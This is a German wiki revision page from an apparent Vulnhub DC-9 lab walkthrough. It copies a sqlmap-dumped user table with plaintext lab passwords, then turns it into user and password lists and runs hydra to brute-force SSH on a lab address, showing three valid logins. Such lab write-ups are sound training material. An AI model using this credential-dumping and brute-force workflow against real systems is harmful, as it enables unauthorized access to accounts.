Vulnhub dc-9 User und Passwörter testen: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Der Seiteninhalt wurde durch einen anderen Text ersetzt: „=Die Tabelle= *wir holen uns die Tablelle ins Arbeitsverzeichniss *'''cp .local/share/sqlmap/output/10.0.10.58/dump/users/UserDetail…“) Markierung: Ersetzt |
|||
| (5 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt) | |||
| Zeile 2: | Zeile 2: | ||
*wir holen uns die Tablelle ins Arbeitsverzeichniss | *wir holen uns die Tablelle ins Arbeitsverzeichniss | ||
*'''cp .local/share/sqlmap/output/10.0.10.58/dump/users/UserDetails.csv .''' | *'''cp .local/share/sqlmap/output/10.0.10.58/dump/users/UserDetails.csv .''' | ||
| + | *cat UserDetails.csv | ||
| + | <pre> | ||
| + | id,lastname,password,reg_date,username,firstname | ||
| + | 1,Moe,3kfs86sfd,2019-12-29 16:58:26,marym,Mary | ||
| + | 2,Dooley,468sfdfsd2,2019-12-29 16:58:26,julied,Julie | ||
| + | 3,Flintstone,4sfd87sfd1,2019-12-29 16:58:26,fredf,Fred | ||
| + | 4,Rubble,RocksOff,2019-12-29 16:58:26,barneyr,Barney | ||
| + | 5,Cat,TC&TheBoyz,2019-12-29 16:58:26,tomc,Tom | ||
| + | 6,Mouse,B8m#48sd,2019-12-29 16:58:26,jerrym,Jerry | ||
| + | 7,Flintstone,Pebbles,2019-12-29 16:58:26,wilmaf,Wilma | ||
| + | 8,Rubble,BamBam01,2019-12-29 16:58:26,bettyr,Betty | ||
| + | 9,Bing,UrAG0D!,2019-12-29 16:58:26,chandlerb,Chandler | ||
| + | 10,Tribbiani,Passw0rd,2019-12-29 16:58:26,joeyt,Joey | ||
| + | 11,Green,yN72#dsd,2019-12-29 16:58:26,rachelg,Rachel | ||
| + | 12,Geller,ILoveRachel,2019-12-29 16:58:26,rossg,Ross | ||
| + | 13,Geller,3248dsds7s,2019-12-29 16:58:26,monicag,Monica | ||
| + | 14,Buffay,smellycats,2019-12-29 16:58:26,phoebeb,Phoebe | ||
| + | 15,McScoots,YR3BVxxxw87,2019-12-29 16:58:26,scoots,Scooter | ||
| + | 16,Trump,Ilovepeepee,2019-12-29 16:58:26,janitor,Donald | ||
| + | 17,Morrison,Hawaii-Five-0,2019-12-29 16:58:28,janitor2,Scott | ||
| + | </pre> | ||
| + | =Wir generieren 2 Dateien= | ||
| + | *'''cut -d , -f 5 < UserDetails.csv > users.txt''' | ||
| + | *'''cut -d , -f 3 < UserDetails.csv > pass.txt''' | ||
| + | *'''hydra -L users.txt -P pass.txt 10.0.10.58 ssh''' | ||
| + | Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore | ||
| + | laws and ethics anyway). | ||
| + | |||
| + | Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-09 11:06:56 | ||
| + | [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 | ||
| + | [DATA] max 16 tasks per 1 server, overall 16 tasks, 361 login tries (l:19/p:19), ~23 tries per task | ||
| + | [DATA] attacking ssh://10.0.10.58:22/ | ||
| + | [22][ssh] host: 10.0.10.58 login: '''chandlerb password: UrAG0D!''' | ||
| + | [22][ssh] host: 10.0.10.58 login: '''joeyt password: Passw0rd''' | ||
| + | [STATUS] 259.00 tries/min, 259 tries in 00:01h, 106 to do in 00:01h, 12 active | ||
| + | [22][ssh] host: 10.0.10.58 login: '''janitor password: Ilovepeepee''' | ||
| + | 1 of 1 target successfully completed, 3 valid passwords found | ||
| + | [WARNING] Writing restore file because 2 final worker threads did not complete until end. | ||
| + | [ERROR] 2 targets did not resolve or could not be connected | ||
| + | [ERROR] 0 target did not complete | ||
| + | Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-09 11:08:22 | ||
Aktuelle Version vom 9. März 2023, 10:23 Uhr
Die Tabelle
- wir holen uns die Tablelle ins Arbeitsverzeichniss
- cp .local/share/sqlmap/output/10.0.10.58/dump/users/UserDetails.csv .
- cat UserDetails.csv
id,lastname,password,reg_date,username,firstname 1,Moe,3kfs86sfd,2019-12-29 16:58:26,marym,Mary 2,Dooley,468sfdfsd2,2019-12-29 16:58:26,julied,Julie 3,Flintstone,4sfd87sfd1,2019-12-29 16:58:26,fredf,Fred 4,Rubble,RocksOff,2019-12-29 16:58:26,barneyr,Barney 5,Cat,TC&TheBoyz,2019-12-29 16:58:26,tomc,Tom 6,Mouse,B8m#48sd,2019-12-29 16:58:26,jerrym,Jerry 7,Flintstone,Pebbles,2019-12-29 16:58:26,wilmaf,Wilma 8,Rubble,BamBam01,2019-12-29 16:58:26,bettyr,Betty 9,Bing,UrAG0D!,2019-12-29 16:58:26,chandlerb,Chandler 10,Tribbiani,Passw0rd,2019-12-29 16:58:26,joeyt,Joey 11,Green,yN72#dsd,2019-12-29 16:58:26,rachelg,Rachel 12,Geller,ILoveRachel,2019-12-29 16:58:26,rossg,Ross 13,Geller,3248dsds7s,2019-12-29 16:58:26,monicag,Monica 14,Buffay,smellycats,2019-12-29 16:58:26,phoebeb,Phoebe 15,McScoots,YR3BVxxxw87,2019-12-29 16:58:26,scoots,Scooter 16,Trump,Ilovepeepee,2019-12-29 16:58:26,janitor,Donald 17,Morrison,Hawaii-Five-0,2019-12-29 16:58:28,janitor2,Scott
Wir generieren 2 Dateien
- cut -d , -f 5 < UserDetails.csv > users.txt
- cut -d , -f 3 < UserDetails.csv > pass.txt
- hydra -L users.txt -P pass.txt 10.0.10.58 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-09 11:06:56 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 361 login tries (l:19/p:19), ~23 tries per task [DATA] attacking ssh://10.0.10.58:22/ [22][ssh] host: 10.0.10.58 login: chandlerb password: UrAG0D! [22][ssh] host: 10.0.10.58 login: joeyt password: Passw0rd [STATUS] 259.00 tries/min, 259 tries in 00:01h, 106 to do in 00:01h, 12 active [22][ssh] host: 10.0.10.58 login: janitor password: Ilovepeepee 1 of 1 target successfully completed, 3 valid passwords found [WARNING] Writing restore file because 2 final worker threads did not complete until end. [ERROR] 2 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-09 11:08:22